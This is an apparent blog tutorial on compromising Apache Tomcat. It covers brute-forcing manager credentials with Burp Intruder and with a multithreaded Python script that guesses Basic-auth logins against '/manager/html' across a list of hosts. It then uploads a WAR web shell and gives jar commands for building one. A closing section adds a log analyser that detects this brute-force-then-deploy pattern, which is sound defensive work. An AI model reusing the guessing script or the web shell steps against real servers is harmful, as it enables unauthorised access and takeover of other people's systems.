Web middleware: Tomcat brute forcing with Burp and a Python script, getshell, WAR packages
2018-04-26 10:21
1. Brute-forcing weak Tomcat passwords with Burp Suite
First, capture the request.
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/f7090718acee9c60f14b66c754ba6bf3.png)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/ece3a12da7fb945a0bf7da28fba5aed4.png)
Send it to Intruder.
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/25d680afff6cb27539ebb494d69c916a.png)
For the payload type, select Custom iterator.
For the first payload choose the username file, for the second payload use `:`, and for the third choose the password file.
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/d588b806fb5c4435a79ac8f38a0a6168.png)
Set Base64 encoding and turn off URL encoding.
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/eee934599776a102fc4c10cd2e00d71e.png)
Start the attack and obtain the username and password.
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/61d058e5bffc3e6993be1ac775266e4d.png)
2. Brute-forcing with a Python script
I am currently learning Python.

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#by.really
import sys
import requests
import threading
import Queue
import time
import base64
import os

#headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'}
u=Queue.Queue()
p=Queue.Queue()
n=Queue.Queue()
#def urllist()
urls=open('url.txt','r')

def urllist():
    for url in urls:
        url=url.rstrip()
        u.put(url)

def namelist():
    names=open('name.txt','r')
    for name in names:
        name=name.rstrip()
        n.put(name)

def passlist():
    passwds=open('pass.txt','r')
    for passwd in passwds:
        passwd=passwd.rstrip()
        p.put(passwd)

def weakpass(url):
    namelist()
    while not n.empty():
        name =n.get()
        #print name
        passlist()
        while not p.empty():
            good()
            #name = n.get()
            passwd = p.get()
            #print passwd
            headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))}
            try:
                r =requests.get(url,headers=headers,timeout=3)
                #print r.status_code
                if r.status_code==200:
                    print '[turn] ' +url+' '+name+':'+passwd
                    f = open('good.txt','a+')
                    f.write(url+' '+name+':'+passwd+'\n')
                    f.close()
                else:
                    print '[false] ' + url+' '+name+':'+passwd
            except:
                print '[false] ' + url+' '+name+':'+passwd

def list():
    while u.empty():
        url = u.get()
        weakpass(name,url)

def thread():
    urllist()
    tsk=[]
    for i in open('url.txt').read().split('\n'):
        i = i + '/manager/html'
        t = threading.Thread(target=weakpass,args=(i,))
        tsk.append(t)
    for t in tsk:
        t.start()
        t.join(1)
        #print "current has %d threads" % (threading.activeCount() - 1)

def good():
    good_ = 0
    for i in open('good.txt').read().split('\n'):
        good_+=1
    os.system('title "weakpass------good:%s"' % (good_))

if __name__=="__main__":
    # alllist()
    thread()
```
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/af43e7af36d97b214966086a9efd6bb8.png)
3. getshell
After logging in successfully, upload the prepared WAR package to get a shell.
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/c743ac21eda1b57fa2d618581745d883.png)
Success.
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/27/4925702d6d07d6f1c3b93d0760047970.png)
4. Building the WAR package

```
jar -cf test.war cmd.jsp
jar -cf shell.war cmd1/*
```
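
From the defender's side, the sequence in sections 1 to 3 (a burst of 401 responses on `/manager/html`, then a 200, then a WAR upload through the manager) is visible in Tomcat's access log. The following is an added example, not code from the original post; it assumes the AccessLogValve `common` pattern, a threshold of 5 failures, the upload path `/manager/html/upload`, and a constructed sample log.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
THRESHOLD = 5  # assumed: 401s from one client before it counts as guessing

# Constructed sample log (not from the original post): six failed logins,
# a success and a WAR upload from one client, plus one ordinary admin login.
_FAIL = '203.0.113.7 - - [26/Apr/2018:10:01:0%d +0800] "GET /manager/html HTTP/1.1" 401 2473'
SAMPLE_LOG = "\n".join([_FAIL % i for i in range(6)] + [
    '203.0.113.7 - tomcat [26/Apr/2018:10:01:07 +0800] "GET /manager/html HTTP/1.1" 200 15234',
    '203.0.113.7 - tomcat [26/Apr/2018:10:02:11 +0800] "POST /manager/html/upload HTTP/1.1" 200 17310',
    '198.51.100.20 - - [26/Apr/2018:10:05:00 +0800] "GET /manager/html HTTP/1.1" 401 2473',
    '198.51.100.20 - admin [26/Apr/2018:10:05:03 +0800] "GET /manager/html HTTP/1.1" 200 15234',
])

def analyze(log_text, threshold=THRESHOLD):
    """Flag clients with >= threshold 401s on /manager/ and record what followed."""
    state = defaultdict(lambda: {"failures": 0, "user": None, "deploys": []})
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # line is not in the expected format
        ip, user, method, path, status = m.groups()
        if not path.startswith("/manager/"):
            continue
        s = state[ip]
        if status == "401":
            s["failures"] += 1
        elif status == "200" and s["failures"] >= threshold:
            # A success after a burst of failures: the account that was guessed.
            s["user"] = s["user"] or user
            if method == "POST" and path.startswith("/manager/html/upload"):
                s["deploys"].append(path)  # WAR deployed through the manager
    return {ip: s for ip, s in state.items() if s["failures"] >= threshold}

if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(ip, s)
```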